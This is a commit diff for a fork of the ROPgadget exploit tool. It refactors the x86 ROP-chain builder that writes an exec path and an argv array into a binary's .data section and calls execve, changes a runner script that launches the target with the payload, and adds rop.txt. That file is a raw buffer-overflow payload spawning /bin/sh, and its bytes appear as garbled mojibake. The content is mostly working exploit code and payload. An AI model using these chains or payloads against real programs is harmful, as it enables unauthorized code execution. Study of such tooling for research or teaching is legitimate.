neater address variable management

ROPgadget/ropgadget/ropchain/arch/ropmakerx86.py

@@ -84,7 +84,6 @@ class ROPMakerX86(object):
         return p
 
     def __buildRopChain(self, write4where, popDst, popSrc, xorSrc, xorEax, incEax, popEbx, popEcx, popEdx, syscall):
-
         sects = self.__binary.getDataSections()
         dataAddr = None
         for s in sects:
@@ -103,12 +102,38 @@ class ROPMakerX86(object):
             command = (4 - (len(command) % 4)) * "/" + command
         command_chunks = wrap(command, 4)
 
+        ## EXEC (ARG0) \0 ARG1 \0 ARG2 \0 ... \0 PTR->EXEC PTR->ARG1 PTR->ARG2 ... \0 ##
+
+        args = []
+        
+        # & ( "cat" \0 )
+        exec_addr = dataAddr
+
+        arg_addr  = []
+
+        # setup argv array
+        # [ & "--run" \0 , & "--verbose" \0 ]
+        # note that the null bytes may be written "earlier", when the string is not len % 4 == 0
+        acc_addr = exec_addr + len(command) + 4
+        for i, arg in enumerate(args):
+            arg_addr.append(acc_addr)
+
+            acc_addr += len(arg) + (4 - (len(arg) % 4)) + 4
+
+        # & ( [ ptr -> "cat" ] ++ arg_addr )
+        argv_addr = acc_addr
+
+        env_addr = argv_addr + (len(args) * 4) + 4
+
+        del acc_addr
+
+        ###################
+        # WRITE EXEC PATH #
+        ###################
+
         # write the command
-        address = 0
-        offset = 0
         for i, chunk in enumerate(command_chunks):
-            offset = (i * 4)
+            address = exec_addr + (i * 4)
-            address = dataAddr + offset
 
             p += pack("<I", popDst['vaddr'])
 
@@ -122,12 +147,10 @@ class ROPMakerX86(object):
             p += pack("<I", write4where['vaddr'])
             p += self.__padding(write4where, {})
 
-        offset += 4
-        address += 4
 
-        # write null byte after command string
+        # write null byte after exec path string
         p += pack("<I", popDst['vaddr'])
-        p += pack("<I", address)
+        p += pack("<I", exec_addr + len(command))
         p += self.__padding(popDst, {})
 
         p += pack("<I", xorSrc["vaddr"])
@@ -136,28 +159,34 @@ class ROPMakerX86(object):
         p += pack("<I", write4where["vaddr"])
         p += self.__padding(write4where, {})
 
-        p += pack("<I", popEbx["vaddr"])
+        ##########################
-        p += pack("<I", dataAddr) # @ .data
+        # Write Argument Strings #
-        p += self.__padding(popEbx, {})
+        ##########################
 
-        # write end + 4, after the null bytes
+
+        ####################
+        # Write Argv Array #
+        ####################
+
+        # put argvAddr in edx
         p += pack('<I', popDst['vaddr'])
-        p += pack('<I', address + 4) # @ .data + {offset + 4}
+        p += pack('<I', argv_addr) # @ .data + {offset + 4}
         p += self.__padding(popDst, {})
 
-        # write the data base address, which is the start of argv
+        # write the exec path address to eax
         p += pack('<I', popSrc['vaddr'])
-        p += pack('<I', dataAddr) # @ .data
+        p += pack('<I', exec_addr) # @ .data
         p += self.__padding(popSrc, {popDst["gadget"].split()[1]: dataAddr}) # Don't overwrite reg dst
 
         # perform the write: eax -> [edx]
+        # write the exec path address to argv[0]
         p += pack('<I', write4where['vaddr']) # {write4where['gadget']}")
         p += self.__padding(write4where, {})
 
 
-        # ARGV MUST BE FOLLOWED BY NULL POINTER
+        # ARGV MUST BE FOLLOWED BY NULL
         p += pack('<I', popDst['vaddr']) # { popDst['gadget'] }
-        p += pack('<I', address + 8) # @ .data + {offset + 8}
+        p += pack('<I', argv_addr + (len(args) * 4) + 4) # @ .data + {offset + 8}
         p += self.__padding(popDst, {})
 
         p += pack('<I', xorSrc["vaddr"])
@@ -166,22 +195,30 @@ class ROPMakerX86(object):
         p += pack('<I', write4where["vaddr"])
         p += self.__padding(write4where, {})
 
+        ##################################
+        # Setup execve Args in Registers #
+        ##################################
 
-        ## MEMORY LAYOUT: PROGRAM, NULL, POINTER TO ARGV WHICH FOR NOW IS BACK TO THE START, NULL
+        # ebx = exec_path
-
+        p += pack("<I", popEbx["vaddr"])
+        p += pack("<I", exec_addr) # @ .data
+        p += self.__padding(popEbx, {})
 
+        # ecx = ptr_to_argv
         p += pack('<I', popEcx["vaddr"])
-        p += pack('<I', address + 4) # @ .data + {offset + 4}
+        p += pack('<I', argv_addr)
         p += self.__padding(popEcx, {"ebx": dataAddr}) # Don't overwrite ebx
 
+        # edx = _ (empty for env vars)
         p += pack('<I', popEdx["vaddr"])
-        p += pack('<I', address) # @ .data + {offset}
+        p += pack('<I', env_addr)
         p += self.__padding(popEdx, {"ebx": dataAddr, "ecx": address}) # Don't overwrite ebx and ecx
 
+        # eax = 0
         p += pack('<I', xorEax["vaddr"])
         p += self.__padding(xorEax, {"ebx": dataAddr, "ecx": address}) # Don't overwrite ebx and ecx
 
-        # 11 = execve
+        # eax ++-> 11
         for i in range(11):
             p += pack('<I', incEax["vaddr"])
             p += self.__padding(incEax, {"ebx": dataAddr, "ecx": address}) # Don't overwrite ebx and ecx

autoRop.py

@@ -104,6 +104,7 @@ result = subprocess.run(
 print(f"  └─[🤩] All done! The ROP input is saved to {rop_file}!")
 
 if run:
+    pwnlibexit._run_handlers()
     print()
     print(f"[ Run Program : ./{exec_file} {rop_file} ]")
     os.execv(exec_file, [exec_file, rop_file])

rop.txt

@@ -0,0 +1,4 @@
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;в`ђ
ж‰
+//biхl;вdђ
ж‰
+n/shхl;вhђ
°bхl;вlђ
ж‰
+`ђ
хl;вpђ
°bхlЙЃ`ђ
bвlђ
`ђ
;вpђ
°bЪ¶Ъ¶Ъ¶Ъ¶Ъ¶Ъ¶Ъ¶Ъ¶Ъ¶Ъ¶Ъ¶у•

test.sh

@@ -0,0 +1,3 @@
+#!/bin/bash
+
+echo "$1"